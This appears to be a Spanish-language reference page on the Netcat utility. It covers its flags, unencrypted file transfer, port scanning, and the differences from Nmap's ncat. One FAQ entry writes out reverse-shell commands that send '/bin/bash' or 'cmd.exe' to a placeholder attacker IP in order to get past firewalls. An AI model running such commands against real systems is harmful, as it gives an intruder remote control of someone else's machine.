Volver a herramientas

¿Qué es Netcat?

Netcat (nc) es una utilidad de red que permite leer y escribir conexiones TCP/UDP. Es conocida como la "navaja suiza" de las redes por su versatilidad.

  • -l: Modo servidor (escuchar)
  • -p: Especificar puerto
  • -u: Usar UDP en lugar de TCP
  • -v: Modo verboso
  • -w: Timeout de conexión
  • -e: Ejecutar comando al conectar (shell)
  • -z: Modo escaneo (sin datos)

Preguntas frecuentes

¿Cómo usar netcat para transferir archivos entre dos servidores Linux?

Para transferir archivos con netcat, en el servidor receptor ejecuta `nc -lvp 9999 > archivo_recibido` y en el emisor `nc -w 3 IP_DESTINO 9999 < archivo_origen`. El flag `-l` pone netcat en modo escucha, `-v` activa verbose y `-p 9999` define el puerto. El flag `-w 3` añade un timeout de 3 segundos. Es una transferencia sin cifrado, ideal para redes internas controladas donde no se requiere seguridad adicional.

¿Cómo hacer un escaneo de puertos con netcat?

Netcat puede escanear puertos usando `nc -zv -w 1 IP 1-1000`. El flag `-z` activa el modo zero-I/O (solo sondea si el puerto está abierto, sin enviar datos), `-v` muestra los resultados y `-w 1` define el timeout por puerto. Para filtrar solo los puertos abiertos, añade `2>&1 | grep succeeded`. Para escaneo UDP añade `-u`. Netcat es más limitado que nmap pero útil para escaneos rápidos sin instalar herramientas adicionales.

¿Qué es una reverse shell con netcat y cómo se ejecuta?

Una reverse shell con netcat permite que la máquina objetivo inicie una conexión de vuelta al atacante, evitando firewalls que bloquean conexiones entrantes. En la máquina atacante ejecuta `nc -lvp 4444`. En la víctima usa `nc IP_ATACANTE 4444 -e /bin/bash` en Linux o `nc IP_ATACANTE 4444 -e cmd.exe` en Windows con netcat tradicional. Alternativas modernas como ncat incluyen SSL y reconexión automática.

Diferencia entre netcat tradicional y ncat de Nmap

El netcat tradicional (`nc`) es la herramienta original con funcionalidad básica: conexiones TCP/UDP, escaneo simple de puertos, transferencia de archivos y bind/reverse shells. Ncat, desarrollado por el equipo de Nmap, es la versión moderna con características adicionales como soporte SSL/TLS (`--ssl`), transferencia cifrada, reconexión automática (`--keep-open`), capacidad de proxy SOCKS, y mejor compatibilidad cross platform. Ncat es recomendado para entornos de producción donde se necesita seguridad.

Consulta información detallada de miles de puertos TCP/UDP con comandos netcat, reglas de firewall y riesgos de seguridad en nuestra guía de puertos.